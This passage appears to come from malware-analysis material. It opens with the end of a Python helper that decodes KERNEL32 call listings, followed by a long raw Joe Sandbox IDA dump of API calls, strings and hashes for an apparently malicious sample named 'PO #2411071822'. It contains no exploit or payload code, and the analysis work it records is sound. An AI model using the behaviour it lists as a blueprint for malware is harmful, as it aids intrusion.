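• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00427C4C
"""

if __name__ == "__main__":
    calls = parse_api_block(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {describe(c)}")
    print("forced close:", forced_close_sequence(calls))
```

                                                                                                              The trailing arguments the report prints after the real parameter count (the repeated 00000010, 00000002, 000001F4 on OpenProcess and later calls) are stack residue from the earlier calls, which is why the decoder only looks at the leading positions each API actually takes.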
                                                                                                              APIs
                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00429A33
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A44
                                                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A51
                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A5E
                                                                                                                • Part of subcall function 004293D1: CloseHandle.KERNEL32(?,?,00429A6B,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 004293DB
                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00429A71
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00455DEE,?,?,?,?,?,003EED63), ref: 00429A78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3495660284-0
                                                                                                              • Opcode ID: 60d36eac61474d8114e91167298f7f674fdc06369c66d9bbc982e60b5eb0ef7e
                                                                                                              • Instruction ID: 15a09142c08335e1de9612733818fb20c29c770644c172ac6ec9836777d6df5e
                                                                                                              • Opcode Fuzzy Hash: 60d36eac61474d8114e91167298f7f674fdc06369c66d9bbc982e60b5eb0ef7e
                                                                                                              • Instruction Fuzzy Hash: 44F03A32F41211ABD7111BA4EC999EB7729FB88701F5404B6F503951A0EBB99C01DA6A
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FF4EA: std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                                • Part of subcall function 003FF4EA: __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                              • __swprintf.LIBCMT ref: 003E1EA6
                                                                                                              Strings
                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003E1D49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                              • API String ID: 2125237772-557222456
                                                                                                              • Opcode ID: 1005149ace63bcc68a0d0063846654df3f023ad8d03aefd331b46013519fe2cc
                                                                                                              • Instruction ID: fa58a84e3d4ab785aed2f190b21e9898cd947ab3b017cb51f289aee26fb3b896
                                                                                                              • Opcode Fuzzy Hash: 1005149ace63bcc68a0d0063846654df3f023ad8d03aefd331b46013519fe2cc
                                                                                                              • Instruction Fuzzy Hash: 09917D711043A1AFC716EF25C896C6FB7A4AF95700F004A1EF8859B2E2DB74ED05CB96
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043B006
                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 0043B115
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0043B298
                                                                                                                • Part of subcall function 00429DC5: VariantInit.OLEAUT32(00000000), ref: 00429E05
                                                                                                                • Part of subcall function 00429DC5: VariantCopy.OLEAUT32(?,?), ref: 00429E0E
                                                                                                                • Part of subcall function 00429DC5: VariantClear.OLEAUT32(?), ref: 00429E1A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                              • Opcode ID: fa8d1473ed622c159d0b3bb6515e9d014aaac649fea44b5916c914da84715f18
                                                                                                              • Instruction ID: b9e9742710e60544bfca89dae10a9a38c06419d560c9d3aebf414dfef72ef46d
                                                                                                              • Opcode Fuzzy Hash: fa8d1473ed622c159d0b3bb6515e9d014aaac649fea44b5916c914da84715f18
                                                                                                              • Instruction Fuzzy Hash: 46918A306083419FCB10DF25C485A5BBBF4EF89704F04496EF99A9B3A2DB35E905CB96
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FC6F4: _wcscpy.LIBCMT ref: 003FC717
                                                                                                              • _memset.LIBCMT ref: 00425438
                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 00425467
                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00425513
                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0042553D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 4152858687-4108050209
                                                                                                              • Opcode ID: 25252a0acd4452cb51e1c3d9e530a06f728c715cad2853924e03d7869cd1df6d
                                                                                                              • Instruction ID: a98cfccb1a580532ab3ffb0bfec07548cefc6fc31b68b0d08c551743611e71c1
                                                                                                              • Opcode Fuzzy Hash: 25252a0acd4452cb51e1c3d9e530a06f728c715cad2853924e03d7869cd1df6d
                                                                                                              • Instruction Fuzzy Hash: B651FF71704621AAD315EE28E84176BB7E8AF95350F84062FF895D22A0DBB8CD80875A
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0042027B
                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004202B1
                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004202C2
                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00420344
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                              • String ID: DllGetClassObject
                                                                                                              • API String ID: 753597075-1075368562
                                                                                                              • Opcode ID: 3e72964e90e0b3a5673718c6d7d26a252987dd3102fded8293fc50545dd50166
                                                                                                              • Instruction ID: 34171231c4b9f855661739614a0c6e6a032955ee753f2ccabb85b0abce5efd00
                                                                                                              • Opcode Fuzzy Hash: 3e72964e90e0b3a5673718c6d7d26a252987dd3102fded8293fc50545dd50166
                                                                                                              • Instruction Fuzzy Hash: 30413C71B00214AFDB05CF54D884B9ABBF9EF48314B5480AAED099F206D7B9D944CBA5
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00425075
                                                                                                              • GetMenuItemInfoW.USER32 ref: 00425091
                                                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004250D7
                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004A1708,00000000), ref: 00425120
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1173514356-4108050209
                                                                                                              • Opcode ID: 4608d8e5a4cb402d127065270ac3f6cccd4c4a315de5c0fa06f904f45d60da80
                                                                                                              • Instruction ID: df6a1c78d91943526ed4a6ad8eb057972f0a864222dabe46cceffba957dc0ba6
                                                                                                              • Opcode Fuzzy Hash: 4608d8e5a4cb402d127065270ac3f6cccd4c4a315de5c0fa06f904f45d60da80
                                                                                                              • Instruction Fuzzy Hash: E441AE307047119FD720DF29E884B6BB7E4AF85328F04462EF85597391D774E810CB6A
                                                                                                              APIs
                                                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00440587
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharLower
                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                              • API String ID: 2358735015-567219261
                                                                                                              • Opcode ID: fd336047704b9863fe0752c4e79e98718a3d19f3cecedc0caeb9c4db80d6b28d
                                                                                                              • Instruction ID: 32a57d009e1a0ab02bbb4ab93d628dfc7052ff273941dcd5ed73a1a10a4008fa
                                                                                                              • Opcode Fuzzy Hash: fd336047704b9863fe0752c4e79e98718a3d19f3cecedc0caeb9c4db80d6b28d
                                                                                                              • Instruction Fuzzy Hash: 2B31A13050021AABCF01EF54C9419EFB7B4FF54314B10862AF926AB2D1DB75A916CB84
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0041B88E
                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0041B8A1
                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 0041B8D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 2ede0fe2debe153f07c744abe2a53372efe5f11be0beb6d5dba581ef7606374c
                                                                                                              • Instruction ID: 564b3be1733266526f2702b1480400d56197bf2aa77215d04538611749b5c324
                                                                                                              • Opcode Fuzzy Hash: 2ede0fe2debe153f07c744abe2a53372efe5f11be0beb6d5dba581ef7606374c
                                                                                                              • Instruction Fuzzy Hash: D52101B2E00108BFDB05AB65C886AFF777CDF45754B10422AF021A61E0DBB80D4686A8
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 003E522F
                                                                                                              • _wcscpy.LIBCMT ref: 003E5283
                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003E5293
                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00453CB0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                              • String ID: Line:
                                                                                                              • API String ID: 1053898822-1585850449
                                                                                                              • Opcode ID: c79e85b69dfc82956624338ad07d730147e9c0c8253ec2a60de13e52c27196ad
                                                                                                              • Instruction ID: fe0bdf68ddfa66052e2d60d9655c7c6729b571449524afae445bb7de35c04e05
                                                                                                              • Opcode Fuzzy Hash: c79e85b69dfc82956624338ad07d730147e9c0c8253ec2a60de13e52c27196ad
                                                                                                              • Instruction Fuzzy Hash: 0831F5714083A06FC722EB51DC42FDF7BD8AF45344F00462EF5859A0E2EB74A648CB9A
                                                                                                              APIs
                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00434401
                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00434427
                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00434457
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043449E
                                                                                                                • Part of subcall function 00435052: GetLastError.KERNEL32(?,?,004343CC,00000000,00000000,00000001), ref: 00435067
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1951874230-3916222277
                                                                                                              • Opcode ID: eca22f20997eb29a34eaf4aebe80d71158b57a3bb1910e0f44a6085c25042053
                                                                                                              • Instruction ID: 2ebce583cca25d2dbe8338ede9aa8a82f64fe7ed0bee03ddeb8f97338a03a14e
                                                                                                              • Opcode Fuzzy Hash: eca22f20997eb29a34eaf4aebe80d71158b57a3bb1910e0f44a6085c25042053
                                                                                                              • Instruction Fuzzy Hash: B421B0B1A00208BFE7119F95CC85EFB76FCEB9C758F10942BF10592240EA69AD05977A
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
                                                                                                                • Part of subcall function 003FD17C: GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                                • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0044915C
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00449163
                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00449178
                                                                                                              • DestroyWindow.USER32(?), ref: 00449180
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                              • String ID: SysAnimate32
                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                              • Opcode ID: 82a48a23b89c09b6f97e6b4b7f33b5344ddc23e8629b69cdcdadcc12b3107855
                                                                                                              • Instruction ID: 8be8975beb4264351d4a02715e2aa6bd6a6504032666fd81d419d9829844e017
                                                                                                              • Opcode Fuzzy Hash: 82a48a23b89c09b6f97e6b4b7f33b5344ddc23e8629b69cdcdadcc12b3107855
                                                                                                              • Instruction Fuzzy Hash: A0219F71600606BBFF208E64DC89EBB37ADEF99364F10462AF91492290D775DC42B768
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00429588
                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004295B9
                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 004295CB
                                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00429605
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                              • String ID: nul
                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                              • Opcode ID: 54bf6f4b3041abd22e087493cad2ea94f75adac0b85de60ad3695f0a1eed0399
                                                                                                              • Instruction ID: 1b743b8edf49fe951d141af15d5b1fd04aabfa9a0edcc26a3be9659b2e6b5ba0
                                                                                                              • Opcode Fuzzy Hash: 54bf6f4b3041abd22e087493cad2ea94f75adac0b85de60ad3695f0a1eed0399
                                                                                                              • Instruction Fuzzy Hash: F821B571B00215ABEB119F25EC04A9A77F4AF49324F604A2AFCA1D73D0D774DD81CB58
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00429653
                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00429683
                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00429694
                                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004296CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                              • String ID: nul
                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                              • Opcode ID: e3db845f20821301664e9c3d7cbaf9090ae53dbfb2390963bd0aaeb5fe06f4a5
                                                                                                              • Instruction ID: 5fd82fc33f46e39aaab75560b0d35338cae5ae5147acdb714f59c78dbf1afda5
                                                                                                              • Opcode Fuzzy Hash: e3db845f20821301664e9c3d7cbaf9090ae53dbfb2390963bd0aaeb5fe06f4a5
                                                                                                              • Instruction Fuzzy Hash: 3A21B871B002159BDB109F69AC04E9A77E8AF45734F60061AFCA1D33D0E7B8DC41CB59
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0042DB0A
                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0042DB5E
                                                                                                              • __swprintf.LIBCMT ref: 0042DB77
                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0047DC00), ref: 0042DBB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                              • String ID: %lu
                                                                                                              • API String ID: 3164766367-685833217
                                                                                                              • Opcode ID: 6eb48fe2a3a046b9ab3c5a788369cd049d0830cdd04918b87841b152dd0c669c
                                                                                                              • Instruction ID: 30896be45195e0d5d82910ef519ffa452ef05fb6815862bb1ed2fb7bb1d95ec7
                                                                                                              • Opcode Fuzzy Hash: 6eb48fe2a3a046b9ab3c5a788369cd049d0830cdd04918b87841b152dd0c669c
                                                                                                              • Instruction Fuzzy Hash: 2621D635A00118AFCB10EF55DD81EDEBBB8EF49704B10407AF505EB291DB74EA01CB25
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0041C84A
                                                                                                                • Part of subcall function 0041C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0041C85D
                                                                                                                • Part of subcall function 0041C82D: GetCurrentThreadId.KERNEL32 ref: 0041C864
                                                                                                                • Part of subcall function 0041C82D: AttachThreadInput.USER32(00000000), ref: 0041C86B
                                                                                                              • GetFocus.USER32 ref: 0041CA05
                                                                                                                • Part of subcall function 0041C876: GetParent.USER32(?), ref: 0041C884
                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0041CA4E
                                                                                                              • EnumChildWindows.USER32(?,0041CAC4), ref: 0041CA76
                                                                                                              • __swprintf.LIBCMT ref: 0041CA90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
